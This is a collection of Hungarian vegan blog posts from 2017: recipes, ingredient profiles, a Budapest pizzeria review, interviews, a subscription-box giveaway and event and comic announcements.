keményítő alapú, így kénytelenek voltunk megalkotni saját sajtalternatívánkat rizsből. - mesélték a vegażżi srácok. Árban Budapest egyik legolcsóbb minőségi alapanyagaival dolgozó pizzázójának számít a vegażżi. Annak ellenére, hogy a tészta kelesztése milyen eljárást igényel, valamint hogy fatüzelésű kemencével dolgoznak, a legolcsóbb Marinara 1290-ért, mígy a legdrágább Autunno pizza is csak 1790-ért kapható. Máshol az alap pizza 1790-nél kezdődik, de 1500 ft alatt szinte sehol nem lehet kapni minőségi pizzát, minőségi alapanyagokkal. Egyelőre az Ankert-ben fészkel a vegażżi és egy telepített faházban készítik a fatüzelésű kemencében sült nápolyi pizzákat. Cím: 1061. Paulay Ede utca 33. Nyitvatartás: Vasárnaptól szerdáig: ZÁRVA Csütörtök: 18:00-22:00 Péntek: 18:00-22:00 Szombat: 18:00-22:00 Ha elmész hozzájuk mindenképpen látogass el facebook oldalukra, ahol minden héten kiteszik az aktuális nyitvatartásukat, amely az Ankert-ben megrendezett rendezvényekhez is igazodik. vegażżi facebook oldal: https://www.facebook.com/vegazzipizza/ vegażżi weboldal: www.vegazzi.hu
Chia mag
A chia mag nagyon hasonló tulajdonságokkal bír, mint a Magyarországon őshonos lenmag. Leggyakrabban chia pudingként használják, de tojás helyett is alkalmazható, nagyon egészséges. Egészségre gyakorolt hatása A lenmaghoz hasonlóan magas omega-3, omega-6 és antioxidáns tartalmú, gluténmentes, tápanyagokban rendkívül gazdag alapanyag. A chia kalóriatartalma rendkívül alacsony, magas a rosttartalma, ráadásul hamar jóllakottságérzetet okoz, mert felszívja a vizet,kitölti a gyomrot, és lassítja a szervezetbe jutó cukrok felszívódását. A chia mag könnyen emészthető így tápanyagtartalma valóban hasznosulni tud. Elkészítése Fogyasztható nyersen, müzlibe keverve, illetve salátákhoz szendvicsekhez is, mivel nincsen túlzottan jellegzetes íze. Őrölt formában, különféle tésztaalapú ételekhez is hozzáadhatjuk. Mivel gluténmentes, ezért könnyedén kiváltható vele a liszt, folyadékkal kevert, kocsonyásodott chia magot pedig tojás helyettesítésére is fel lehet használni. Ebből készül az úgynevezett chiapuding, ami gyakorlatilag a beáztatott, megduzzadt, puding állagú magvak ízesítésésvel készülő édesség. Vedd meg itt Chia mag – ZöldPolc Chiamagos receptek The post Chia mag appeared first on VegaNinja.
Csicseriborsó
Ezt a hüvelyest leginkább mondókákból ismerjük, kevésbé része a hétköznapi magyar konyhának sajnos. Pedig tápanyagokban gazdag, jól variálható élelmiszer, ami ráadásul olcsó is. Egészségre gyakorolt hatása Kevés kalóriát tartalmaz, de gazdag B1-, B6-vitaminban és folsavban, E-vitamin és karotin tartalma is magas. Sok magnéziumot, vasat és cinket tartalmaz. Rostokban és fehérjékben is gazdag. Csökkenti a koleszterinszintet, segíti megelőzni a szív- és érrendszeri megbetegedéseket. Alacsony a glikémiás indexe, így cukorbetegek számára különösen ajánlott. Használata Kapható száraz vagy konzerv változatban. A száraz csicseriborsót felhasználás előtt mindenképp be kell áztatni, mert nyersen nem emészthető méreganyagokat tartalmaz. Főzni pedig csak új, tiszta vízben szabad. Amellett, hogy egészséges rendkívül finom is. Jól illenek hozzá az indiai, keleties fűszerek, de magyaros ízesítéssel készítve is kiváló belőle készült étel kerülhet az asztalra. A konzerv csicseriborsót sokkal könnyebb felhasználni, mivel már meg van főzve, de a kimért, száraz csicseri környezetbarátságosabb. Készíthető belőle püré, főzelék, leves, de akár pörköltként is finom. Lisztté őrölve használható sűrítésre, panírozásra, tojás helyettesítésére, de ízletes lepények is készíthetőek belőle. A két legnépszerűbb és leggyakoribb csicseriborsóból készült étel a falafel és a humusz. Vedd meg itt: Konzerv csicseriborsó – ZöldPolc Száraz, bio csicseriborsó – ZöldPolc The post Csicseriborsó appeared first on VegaNinja.
Pofonegyszerű magyaros nemvajkrém
Hozzávalók egy normál magyaros vajkrémes műanyag doboz megtöltéséhez - 125 g főtt bab (konzerv tökéletes) - 2 mk ecet - 1 csapott mk pirospaprika - fél mk őrölt kömény - 1/4 mk fokhagyma granulátum - 1 ek olvasztott kókuszolaj - 1 ek víz Botmixerrel habosítsd össze a hozzávalókat, és kész. És ez tényleg ilyen egyszerű! :) Jó étvágyat! Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat: Kezdő Vegán Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven The post Pofonegyszerű magyaros nemvajkrém appeared first on Kertkonyha.
Sushi quinoaval
Eddig csak rizzsel készült sushit ettem. Azokat is mindig mások készítették. Nagyon szeretem, szóval már itt volt az ideje, hogy kipróbáljam a bambuszos tekercselést és készítsek valami egyedit. Quinoával készítettem. Remek kis útravaló volt, amikor hazautaztunk a nyáron Magyarországra. Lehet, hogy a karácsonyi asztalra is elkészítem. Miért is ne? Krémsajttal, uborkával és paprikával legalább olyan finom, mint avokádóval és paprikával összerakva. A szójaszószból sem árt pár csepp, de a savanyított vékony gyömbérszeletek és a leheletnyi wasabi extra élvezetet kínál hozzá. Hozzávalók: - 1 bögre (250 ml-es) quinoa - 1,5 bögre víz - nagyobb csipetnyi só - 1 szál kígyóuborka - 1 db avokádó - paprika - 3-4 db nori, alga lap - 150 g vegán krémsajt (Tesco free from krémsajtja, opcionális, helyette használhatunk tofut, vagy füstölt tofut) - szójaszósz (opcionális) - wasabi (opcionális) - bambusztekerő Elkészítés: A quinoát jól mossuk át majd a hideg vízben 5-10 percet áztassuk. Utána szűrjük le és sóval, kevergetés nélkül, fedő alatt főzzük puhára. Ha jól megfőtt, a víz elfőtt róla, látjuk, ahogy a szemek egymáshoz tapadnak. Fontos, hogy a quinoa egymáshoz tapadjon. Ha a quinoa teljesen kihűlt, kezdhetjük a sushi összeállítását. Igazából rajtunk áll, mi kerül a sushi közepébe. Készíthetjük csak quinoa és egy- vagy kétfajta zöldséggel, de fel is turbózhatjuk, mindent belepakolva. Az algalapokat terítsük ki a bambusztekerőre (nálam ez egy bambusz tányéralátét volt), egyik végére tegyük a quinoát, helyezzük rá a hosszában felszeletelt uborkából, paprikából, avokádóból, kenjünk rá egy kis krémsajtot, majd szorosan és lehetőleg egyforma vastagságban tekerjük fel. Az algalap úgy fog rátapadni a tekercsre, bezárva a tekercset, ha egy pici vízzel megnedvesítjük. Ha a benedvesített lap szépen rátapad a tekercsre, tegyük hűtőbe, majd kb 10-15 perc múlva jó éles késsel felszeleteljük. A szeletelésnél érdemes először középen elvágni, majd az így kapott két rudat szintén középen elvágni, Ezzel a "felezős" művelettel addig vágjuk, míg kb. 3-4 centiméteres sushiszeleteket, karikákat kapunk.
Vegán életmód – Vegán doboz + nyereményjáték
2017. december 11. Zizi kalandjai
Külföldön (főleg az USA-ban) már eléggé ismert ez a “zsákbamacska” szolgáltatás, ami egy doboz szolgáltatást jelent, amelybe különböző termékek kerülnek minden hónapban és ez a doboz kerül kiszállításra az előfizetőknek. Jelen esetben vegán dobozról van szó, vagyis minden termék, élelmiszer, kozmetikum, ami benne található, az vegán. Elő lehet fizetni erre a szolgáltatásra havonta és mindig várni a meglepetésekkel teli dobozt. Külön, alkalmanként is meg lehet rendelni a dobozt vagy pedig előfizetni rá negyedévre vagy félévre vagy akár egy egész évre. A Vegán Doboz egyik megalkotójával, Áronnal beszélgettem. Az interjú végén pedig egy nyereményjátékot találtok! Mi a Vegán Doboz? A Vegán Doboz egy olyan termék és szolgáltatás együttes, amivel meg tudod lepni a hozzád közel állókat vagy akár saját magadat! Továbbá kiváló eszköz a vegánság terjesztésére, ha egy áttérni vágyónak kell egy utolsó visszacsatolás a döntéshez. Az új dobozok havi rendszerességgel jelennek meg, amire minden hónap 15. napjáig van lehetőségünk előfizetni és a 22. napon pedig már meg is érkezik az ajtód elé. Előfizetni mindig a soron következő dobozra lehetséges, az előző havi dobozokból pedig nincs lehetőség rendelni, ezért érdemes figyelni az oldalt és a Vegán Doboz Facebook oldalát, hogy ne maradjunk le semmiképpen. Mik kerülnek a dobozba? A doboz vegán ételt, ételkiegészítőt, illetve vegán kozmetikumokat tartalmaz, amelyeket magyar és külföldi gyártóktól és termelőktől választunk. Minden termék ellenőrzött forrásból érkezik és 100%-ban gluténmentes. Ezen felül ajándékokkal és meglepetésekkel is készülünk a kedves vevőinknek. A csomagolása természetesen újrahasznosítható. Honnan jött az ötlet, hogy csináljatok egy ilyen szolgáltatást? 2017. szeptember 14-én Budapest belvárosában ketten elhatároztuk, hogy a vegán közösség számára olyan kényelmi szolgáltatásokat fogunk nyújtani, amelyek eddig csak a nem vegán ételek, alapanyagok és termékek esetében voltak jelen Magyarországon. Eredeti ötletünk, amely valószínűleg a “Vegán Étel és Termék Futár Szolgálat” fantázia névre hallgatott volna, meghiúsult, ugyanis sajnos rá kellett eszmélnünk, hogy túl korai a célunk a jelenlegi piaci körülmények mellett. Nem feladva tervünket belevágtunk célunk megvalósításába, amely arra hivatott, hogy terjessze a vegán életformát Magyarországon és szélesítse a jelenlegi vásárlók termék ismeretét, hogy teret nyújtson a további piaci szereplők megjelenésének. Így született meg a Vegándoboz! A termék folyamatosan fejlődni fog és további dobozfajták bevezetését is tervezzük. A pozitív és természetesen a negatív visszajelzéseket figyelembe véve fogunk alakítani szolgáltatásunkon, hogy az teljes mértékben kielégítse a fogyasztóink igényeit. Vegán Doboz elérhetősége: - weboldal - Facebook - Instagram A dobozt a {Vegán Doboz} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** NYEREMÉNYJÁTÉK!!! Nyeremény : Egy szerencsés egy negyedéves előfizetést nyer a Vegán Dobozra! Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen terméket/termékeket látnátok szívesen a dobozban (pl: magyar kézművestől, termelőtől, magyar vagy külföldi cégtől)? Szabályok : A kommentelésen felül plusz pontokért lájkolhatjátok a Vegán Doboz Facebook és Instagram oldalát (írjátok meg ezt is a kommentben, ha megtettétek). 2017. december 14-ig lehet játszani. Sorsolás a random.org-gal. Eredményhirdetés 2017. december 15-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek három hónapon át a Vegán Doboz postázza magyarországi címre.
Ünnepeljük együtt a Magyar Vegán Egyesület születését!
Ahogy a vegánok száma növekszik, egyre nagyobb szükség mutatkozik a vegán emberek érdekvédelmére is. A Magyar Vegán Egyesület (MAVEG) alapításán fél éve dolgoznak aktivisták, de az álmodozást sokkal hamarabb kezdték. Mostanra bejegyzés alatt áll az egyesület, az alapító tagok munkacsoportokat állítanak fel érdekvédelmi (vegán jogásszal), kommunikációs és outreach feladatokra. Most egy bulin járulhatsz hozzá az egyesület sikeréhez! Alapító buli A Magyar Vegán Egyesület, megalakulása alkalmából, fergeteges vegán bulit rendez. Az egyesület vegán előadókkal és koncertekkel, ismert külföldi aktivistákkal, vegán ételekkel a büfében, alkoholos és alkoholmentes italokkal és sok bulizó vegánnal vár minden kedves érdeklődőt. Ráadásul a VegaNinja shop is kint lesz néhány termékkel, gyerek, és nézz szét! Időpont: 2017. december 2. szombat 17-22 óráig Helyszín: Ellátóház (1074 Budapest, Dob u. 19.) A belépés ingyenes, a fogyasztás önköltséges! Vendég Az eseményen személyesen részt vesz Earthling Ed, nagy hatású brit vegán aktivista. Gyere el, ne hagyd ki, hogy beszédét élőben hallhasd! Gyere, és ünnepelj velünk! A program részleteivel folyamatosan bővül az esemény Facebook oldala, amelyet itt tudsz elérni: https://www.facebook.com/events/126042184753316/ A szervezők kéri, hogy segíts a hír terjesztésében! Ha teheted, oszd meg barátaiddal, követőiddel FB-on, Instán, Twitteren és minden lehetséges csatornán a vegán buli hírét! The post Ünnepeljük együtt a Magyar Vegán Egyesület születését! appeared first on VegaNinja.
Z generációs vegánok – interjúsorozat, 4. rész: Papp Flóra
2017. november 10. Zizi kalandjai
A social medianak hála egyre több olyan tizen-huszonéves fiatallal találkozom, akik tudatosak, figyelnek a környezetvédelemre és vegánok lettek. Ők nem egy trendre ülnek fel, hanem tényleg komolyan gondolják ezt az egészet. Ilyen fiatalon megváltoztatják az életüket, a social median keresztül megosztják tapasztalataikat, bátorítják a hasonló korú fiatalokat, akik érzik, hogy változtatni szeretnének, de nem tudják, hogy induljanak el. Mi a titkuk? Hogyan lesznek olyan lenyűgözően természetesek? Ezt szeretném nektek bemutatni ezzel a sorzattal. Fogadjátok szeretettel negyedik interjú alanyomat, Papp Flórát! Flórát személyesen is ismerem, ott volt a Mit eszik a vega gyerek? könyvem bemutatóján és hírét vitte a könyvemnek. Folyamatosan nyomon követem állatorvos egyetemi pályafutását, ugyanis vegánsága mellé egy nagyon szép szakmát választott, az állatoknak szeretne és fog segíteni a jövőben. Bemutatnád magad röviden? Papp Flóra vagyok, 19 éves, első éves állatorvos hallgató. Már több mint két éve vagyok vegán, és már lassan három éve élek húsmentesen. Hogyan fogadta a környezeted (szülők, nagyszülők, barátok, osztálytársak), amikor bejelentetted, hogy vegán leszel/lettél? Mivel én ugye már a veganizmus előtt is vegetáriánus voltam, a környezetemnek nem volt olyan óriási újdonság ez a váltás, teljes mértékig elfogadóak és támogatóak voltak kezdettől fogva. Mi volt a motivációd a váltásra? Három éve nyáron döntöttem el, hogy állatorvos szeretnék lenni, és ezután nem sokkal emiatt el is hagytam a húst az étkezésemből, erre úgy félévre megnéztem pár videót a tej- és a tojásipar borzalmairól, és szinte habozás nélkül áttértem a vegán életmódra. Szóval én teljes mértékig etikai vegán vagyok. A váltás egyik napról a másikra történt vagy szakaszokban (pl. először vegetáriánus lettél és utána vegán)? Igen, ahogy már fentebb is írtam, én félévig szimplán vegetáriánus voltam, de ekkor még a veganizmusról életemben nem hallottam. A tojást és a tejtermékeket pedig egyik napról a másikra hagytam el. Ehhez én még hozzátenném, hogy a veganizmus nem csak abban fejeződik ki, hogy mit eszünk, hanem ez egy életmód, amihez hozzátartozik az öltözködés, szépségápolás stb., és ezek a dolgok azért fokozatosan tudatosultak bennem. A vegán étrend egyfajta tudatosságot is hoz az embernek. Te mire figyelsz oda az egészségedet illetően a vegán étrend miatt (pl. szedsz-e vitamint, több vizet iszol, sportolsz, stb.)? Mióta elkezdtem ezt az egész életmód váltást, sokkal tudatosabb vagyok, szerintem a veganizmus mellett szinte lehetetlen nem tudatosnak lenni. Én egyedül B12 vitamint szedek spray formájában, szerintem minden más szükséges vitamint és tápanyagot be lehet vinni egy jól összeállított teljesértékű növényi étrenddel. Hogyan érzed magad vegánként (egészségügyi, lelki szempontból)? Mivel én fiatalon váltottam, előtte sem voltak különösebb egészségügyi problémáim, szóval nagy változást nekem nem jelentett e téren. Lelkileg viszont sokkal jobban érzem magam, hiszen már csak a tudat boldoggá tesz, hogy nem ártok más élőlényeknek fölöslegesen, és a veganizmusnak hála a kapcsolatom is megjavult az étellel. Okozott-e problémát valaha a vegán étrend, életmód (pl. nem lehet vegán ételt kapni a suliban, egyetemen, az állandóan kíváncsiskodók kérdéseinek a megválaszolása, stb.)? Mindenképpen több tervezést igényel ez a fajta étkezés, de mindig meg tudom oldani. A kíváncsiskodókkal pedig szívesen beszélgetek erről. Melyik az az étel, ami olyan guilty pleasure féle, vagyis nem túl egészséges (még vegán formában sem), de mégsem tudsz neki alkalmanként ellenállni? Nekem ez az elején a DM-ben kapható vegán ‘nutella’ és az ‘oreo keksz’ volt, most pedig ilyen nem nagyon van, maximum a magvajakat mondhatnám annak. Melyik a kedvenc vegán ételed? Hát, igazából a gyümölcsök. Mit üzensz azoknak a fiataloknak, akik szeretnének áttérni a vegán étrendre, de még nem tették meg ezt a lépést? Valamint azoknak a szülőknek, akik aggódnak a vegán étrendre áttért gyermekükért? Azt, hogy tájékozódjanak, nézzenek filmeket, videókat, olvassanak utána a témának, hogy meglegyen az etikai, egészségügyi és környezetvédelmi alap (és ezeket nyugodtan mutassák meg az aggódó szülőknek is, ha arról van szó). Szerintem fontos, hogy el tudják magyarázni, hogy mi áll a döntésük mögött, mert így könnyebben megértheti a környezetük a váltás okát. A cronometer.com nevű oldal óriási segítség lehet még a kezdetekben, szóval azt is nagyon ajánlom. Tanuljanak meg főzni magukra, ne feltétlenül várják el ezt a szüleiktől, hogy nekik külön vegán ételeket főzzenek, ez rengeteget segíthet az elfogadásban. Flórát megtaláljátok: Blog: veganflora.com Instagramon: @veganflora Facebookon: VeganFlora Youtube-on: @VeganFlora
Matcha latte (laktózmentes, gluténmentes, vegán)
2017. november 8. Zizi kalandjai
A szülinapomon (október közepén) elhatároztam, hogy leszokom a mindennapi kávéivásról. Régen csak hetente egyszer ittam kávét (szombatonként) a piacozás után. Aztán másfél éve valahogy rászoktam, hogy szinte mindennap ittam ebéd után, olyan szertartásként. Éreztem, hogy nem jó nekem, meg nem is akartam fejben a mindennapi kávéivást, de valamiért a szertartás annyira belém rögzült, hogy nehéz volt megválni tőle. Aztán I. is elhatározta, hogy abbahagyja a mindennapi kávéivást, így közösen támogatva egymást abbahagytuk és nagyon jó érzés. Lassan egy hónapja, hogy nem ittunk kávét. Most tesztelgetjük a teákat, meg az “alternatív” latte lehetőségeket és sok olyan van, ami nagyon ízlik nekünk. Iszunk koffeinmentes teákat, kurkumás lattekat a kávé helyett. Keresem az újabbnál újabb recepteket és csodás dolgokra bukkanok a neten, mint például ez a spirulinás latte vagy misos latte (ami mézzel készült, de a mézet lehet helyettesíteni más édesítőszerrel) vagy pirított kókusztejes tea (pirított kókusztej? toplistás kipróbálandó!!!) vagy fehércsokis gabonakávés mokka. Persze nem maradhat ki a listáról a matcha latte, ami nagyon nagy népszerűségnek örvend manapság. Már Magyarországon is megtalálható jó pár (főleg) specialty kávézó itallapján. A matcha (??) a rituális japán teaceremóniák köztiszteletben álló teája. A legelső tea magvakat még a kínai Tang-dinasztia (618-907) idején szállították Japánba, hogy orvosságként használhassák. Sokáig csak a papok, nemesek és szamurájok ismerték a jótékony hatásait, melyet féltve őrzött titokként kezeltek. “A matcha a zöld teának egy speciális változata, a neve szó szerint azt jelenti, hogy por állagú tea. Míg a hagyományos zöld tea elkészítése során a tealevelek összetevői belekerülnek a forró vízbe, majd a leveleket ki kell dobni, a matcha esetében a leveleket előbb porrá őrlik, és így vízzel érintkezve akadály nélkül képesek feloldódni. Ennek az eljárásnak köszönhetően a matcha sokkal több hasznos tápanyagot tartalmaz, mint a többi teaféle. A vitaminok és ásványi anyagok mellett antioxidánsokban is gazdag, így megvéd a szívbetegségektől és a ráktól, valamint képes szabályozni a vércukorszintet és a vérnyomást is. A matcha abban is eltér a többi teafélétől, hogy háromszor annyi koffeint tartalmaz, ám ez a koffein a kávéban találhatóval szemben sokkal nyugtatóbb hatású. Ezzel együtt lefekvés előtt hat órával már lehetőleg ne fogyasszuk.” (Forrás: innen). Kathynél az egyik kedvenc vegán bloggeremnél találtok egy nagyon jó összefoglalót a matcharól, a különböző fajtákról és néhány recept ötletről. Aki igazán szeretne profin matcha lattét készíteni, annak ajánlom, hogy szerezzen be egy ilyen bambusz teakeverő ecsetet, ezzel igazán autentikusan lehet elkészíteni a teát. Nekem nincs (még) ilyenem, szóval én kanállal kevertem el a teaport a vízben, a kókusztejet pedig simán habverővel kevertem habosra a teához. Matcha latte (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 2 perc Főzési idő 5 perc Teljes idő 7 perc Kávé helyett, habos kókusztejes zöld tea. Szerző: Zizi Recept típusa: ital Konyha: vegán Adag/mennyiség: 1 főre Hozzávalók 2 teáskanál Veganz kókuszos matcha por 1 teáskanál juharszirup 60 ml meleg víz 125 ml kókusztej (sűrű, krémes) Elkészítés Tegyük a matcha port a bögrébe, adjuk hozzá a nagyon meleg (de nem forrásban lévő) vizet és jól keverjük el. Adjuk hozzá a juharszirupot és azzal is keverjük el. A kókusztejet melegítsük fel egy lábasban és kézi habverővel vagy tejhabosítóval verjük habosra és öntsük rá a matchás keverékre. Fogyasszuk azonnal melegen. Jegyzetek A Veganz matcha por tartalmaz nádcukrot. Érdemes először magában megkóstolni és utána ízesíteni. Nekem jól esett az 1 teáskanál juharszirup. Juharszirup helyett lehet használni agavészirupot, nádcukrot, kókuszvirágcukrot. Bármilyen matcha tea por és növényi tej használható a recepthez. Aroy-D márkájú kókusztejet használtam, nagyon finom lett vele. 3.5.3226 ***** A kókuszos matcha port a {Spar Magyarország} biztosította a recepthez. A véleményem csakis a sajátom.
Az állatok bosszúja különleges képregény az állatok jogairól
2017. október 26. Vegetáriánus receptek
A 2017. november 18-án, szombaton megrendezésre kerülő IX. Szegedi Képregényfesztiválra jelenik meg a Képregény Kedvelők Klubjának legújabb kiadványa, Zivkov Andricin István Az állatok bosszúja című képregény kötete.
Az önéletrajzi elemeket is feldolgozó történet a hatvanas évek Amerikájában játszódik. A képregény két szinten működik: egyszer a nagyközönséget célozza meg, másodszor pedig az állatok jogaiért küzdőket és a környezetvédelem iránt elkötelezetteket. Ha a klasszikusan ironikus, de egyben furcsa és krimiszerű történet mögé nézünk, nagyon komoly problémákra világít rá az állatok jogaival kapcsolatban. A vegán szerző a képregény formanyelvét használja erre a célra hatékonyan. A vér és erőszak túlzott ábrázolása néha éppen ellentétes hatást válthat ki, és bár a képregényben is van pár sokkoló oldal, a szerző igyekezett azt kerülni. Helyet kaptak viszont a téma olyan információi is, melyekről sokan nem tudtak.
Zivkov Andricin István képregényrajzoló, karikaturista; történetei humanitást és humort tükröznek. Belső késztetésre lett vegetáriánus, majd vegán. A 2000-res években lett a belgrádi Szabadságot az állatoknak szervezet elnöke. Nemzetközileg elismert állatjogi aktivista.
A 108 oldalas kötet a szerző további korábban már kiadott és eddig kiadatlan képregényeit gyűjti egybe.
A kiadvány ára 3 200,- Ft, kereskedelmi forgalomba nem kerül, előjegyzéseket a kepregenykedvelok@gmail.com címen 2017. november 5-ig vesznek fel. Az előrendelt kötetek átvehetők a Szegedi Képregényfesztiválon, a december 9-i Hungarocomixen, vagy postai úton, esetleg Budapesten személyesen.
Források: Zivkov Andricin István - Az állatok bosszúja; https://magyarkarikatura.com/m-z/zivkov-andricin-stefan/
Bliszkó Viktor
Vajbab főzelék gyorsan
Csak szimplán ez volt a nyári kedvencem, amig Magyarországon voltunk a nyáron. Sőt, a Bosnyák piacon vettem igazán friss vajbabot visszautazásunk előtt 1-2 nappal, el is hoztuk magunkkal és rögvest az első héten meg is főztem a jó kis főzeléket belőle. Itt, Angliában ugyanis nem ismerik a sárga hüvelyű zöldbabot, legfeljebb lengyel/magyar/kelet európai boltban kaphatsz idényekor. Ráadásul az angolok nem ismerik a főzelék fogalmát, számukra inkább szószok léteznek, de nem ilyen felállásban. A zöldbabnak amúgy v íz- és vizelethajtó, valamint vesetisztító hatása van, kevés fehérjét és szénhidrátot tartalmaz, ráadásul könnyen emészthető, jelentős rosttartalommal bír. Ezek is mutatják, hogy cukorbetegek, fogyókúrázók számára (is) ajánlott étel. A recept Hozzávalók: - 1 kg vajbab - 1,5 ek keményítő - 1 tk pirospaprika - ételízesítő - 2,5 dl növényi tej - szójajoghurt - víz - 3-4 gerezd fokhagyma Elkészítés: A tisztított, darabolt zöldbabot feltesszük főni annyi vízben, ami éppen csak ellepi. Hozzáadunk kb. 1 teáskanálnyi ételízesítőt (nekem házi van, amit mindig én készítek) és lefedve puhára főzzük. Közben a keményítőt, a piros fűszerpaprikát és a hideg növényi tejet csomómentesre keverjük. Amikor a sárga hüvelyű zöldbab szinte már puha, hozzáadjuk a felaprított vagy összenyomott fokhagymát. Tehetünk hozzá vagy petrezselyem zöldet felaprítva, vagy kaprot vagy tárkonyt, de ha csak fokhagymásan szeretnénk enni, úgy is nagyon finom. A megpuhult zöldbabhoz hozzákeverjük a csomómentes tejes-keményítős folyadékot és folyamatosan addig keverjük, míg be nem sűrűsödik. Tálalásnál szójajoghurtot kanalazahatunk a tetejére. Ehetünk hozzá fasítot, bár jobb szeretem anélkül, csak magában, élvezve a vajbab lágy ízét. Főzelékünket elkészíthetjük zsenge, friss vajbabból vagy gyorsfagyasztottból is.
Tippeljen, hány kiló zöldség-gyümölcsöt vesz egy magyar
Annyit segítünk, hogy több mint 330 milliárd forintot költöttek a háztartások zöldségre és gyümölcsre a múlt évben.
Sütőben sült szilvásgombóc
Még Magyarországon jártunkkor kaptunk finom szilvát barátainktól, akik saját fájukról szedték. El is hoztuk Angliába, és egy részéből jó kis szilvásgombócot készítettem egészen egyedülálló módon, ugyanis nem főztem, hanem sütőben sütöttem a gombócot és nem lisztből, hanem kölesből és zabdarából készítettem. Tehát, ha bírod a zabpelyhet, akkor gluténmentesen is elkészítheted. Ha nem bírnád a zabpelyhet, kukoricadarát is használhatsz. Adagokat nem igazán mértem, de szerencsére látni, mikor lehet gombócot formálni a masszából. Dolgozhatunk fagyasztásból kiengedett szilvával, befőttel vagy sűrű lekvárral is. A recept Hozzávalók: - 1,5 bögre köles - darált zabpehely - kókuszvirágcukor vagy gyümölcscukor vagy xylit vagy más édesítő - víz - növényi tej - kb 20 darab szilva - fahéj (ha azzal ízesítenénk a szilvát) - mogyoró vagy dió vagy mandula - sütőpapír - kókuszzsír - agavé vagy datolyaszirup Elkészítés: A kölest alaposan mossuk át, majd egy lábosban öntsük fel a kétszeres mennyiségű vízzel és fedő alatt kis lángon főzzük meg, időnként megkevergetve. Amikor a víz elfőtt róla, adjunk hozzá annyi növényi tejet, ami épp ellepi és főzzük tovább. Ha elfőtte a növényi tejet is, zárjuk el a hőt alatta, és hagyjuk a fedő alatt pihenni addig, míg a szilvát előkészítjük. A szilvákat mossuk meg, vágjuk félig ketté és vegyük ki a magjukat. Ha úgy jobban szeretjük, meghinthetjük egy kis cukorhelyettesítővel és fahéjjal. Én inkább a szilva ízét szeretem, sem mint fahéjasan. Ha kissé kihűlt a köles, édesítsük és adjunk hozzá annyi zabdarát, amennyit magába vesz, amivel könnyen formálható gombócokat tudunk készíteni. Majd enyhén nedvesített kézzel formázzunk púpos evőkanálnyi adagokból gombócokat úgy, hogy a közepükbe szilvát teszünk. A köleses masszát elterítjük a tenyerünkben, beletesszük a szilvát és gombócot formálunk. Sütőpapíros tepsibe helyezzük, épp csak egy aprónyi kókuszzsírt kenünk a gombócok tetejére, majd előmelegített sütőben kb. 20 perc alatt kisütjük. Amíg sül, mogyorót vagy diót vagy mandulát vagy mákot darálhatunk, abba hempergetve kész a finom és ízletes köleses szilvásgombóc. Tálalásnál agavé vagy datolyaszirupot csepegtettünk a gombócok tetejére.
Ropogós sültkrumpli joghurtos zöldfűszeres mártással (laktózmentes, gluténmentes, vegán)
2017. október 9. Zizi kalandjai
Kiváló hétköznapi vacsora, amely gyorsan elkészül, nagyon finom és persze meleg is, olyan kényelmes kaja (comfort food). Jól esik vacsorára egy ilyen ropogós sültkrumpli egy nagy adag zöld salátával. Nemcsak vegán és gluténmentes, hanem olajmentes is, vagyis a krumplit tepsiben sütöttem ropogósra zsiradék nélkül. A legjobb frissen fogyasztva, mert néhány óra múlva finomnak, finom, viszont már nem lesz ropogós. A zöldfűszeres mártáshoz a Veganz bio zöldfűszeres mártás alapporját (Sparban, Intersparban kapható) használtam, amelyben kukoricakeményítő, só és zöldfűszerek vannak, de akinek nincs ilyen, az sima (szója)joghurtba keverjen sót, frissen aprított petrezselymet, snidlinget, esetleg kaprot és már készen is van a mártása. A ropogós sültkrumpli házilag készített ketchuppal is finom (recept a Mit eszik a vega gyerek? szakácskönyvemben), de ha ezzel eszitek, a zöld salátáról akkor se feledkezzetek meg. Muszáj valamivel egészségesebbé tenni ezt a könnyű vacsorát! Ropogós sültkrumpli joghurtos zöldfűszeres mártással (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 40 perc Teljes idő 50 perc Villámgyors hétköznapi kényelmes vacsora: ropogós sültkrumpli! Szerző: Zizi Recept típusa: saláta, vacsora Konyha: vegán, gluténmentes Adag/mennyiség: 4 főre Hozzávalók Sültkrumplihoz: 12 db közepes méretű sütni való krumpli, meghámozva 1 teáskanál pirospaprika 1 teáskanál szárított kakukkfű Himalaya só Joghurtos zöldfűszeres mártáshoz: 1 tasak Veganz bio zöldfűszeres mártás alappor 100 ml szójajoghurt friss petrezselyem, snidling, kapor, aprítva Elkészítés Sültkrumpli: Melegítsük elő a sütőt 200C fokra. Egy nagy tepsit béleljünk ki sütőpapírral. A meghámozott krumplit vágjuk vékony szeletekre (kb. 0.5-0.8 mm) és papírtörlővel töröljük teljesen szárazra. Tegyük egy tálba, szórjuk rá a pirospaprikát és a kakukkfüvet és jól keverjük át, hogy a fűszerek mindenhol befedjék a szeleteket. A fűszeres krumplit szedjük át a tepsibe és tegyük be a sütőbe. Süssük 200C fokon kb. 25-30 percig és közben két-három alkalommal keverjük át, hogy egyenletesen süljenek ropogósra a szeletek. Az utolsó 5 percben a sütőt grill fokozatra és 300C fokra kapcsoltam, hogy enyhén barnára és még ropogósabbra süljenek. Figyeljünk oda, hogy nehogy megégjenek a szeletek! Sózzuk ízlés szerint. Mártás: Öntsük egy kis lábasba a mártás alapport, adjunk hozzá 250 ml hideg vizet. Keverjük csomómentesre. Közepes lángon kezdjük el forralni a mártást, folyamatosan kevergessük és adjunk még hozzá egy kevés hideg vizet, ha túl sűrűnek találjuk. Néhány perc főzés után, a tűzhelyről levéve keverjük hozzá a joghurtot két-három adagban. Szórjuk bele az aprított petrezselymet. Tálaljuk a sültkrumplival. Jegyzetek A sültkrumplit villanysütőben sütöttem. Gázsütő esetén elképzelhető, hogy kevesebb vagy több idő kell, amíg ropogósra sül. A mártás elkészíthető alappor nélkül is. Aprított zöldfűszereket keverjünk (szója)joghurtba, sózzuk meg egy kicsit és már készen is van. 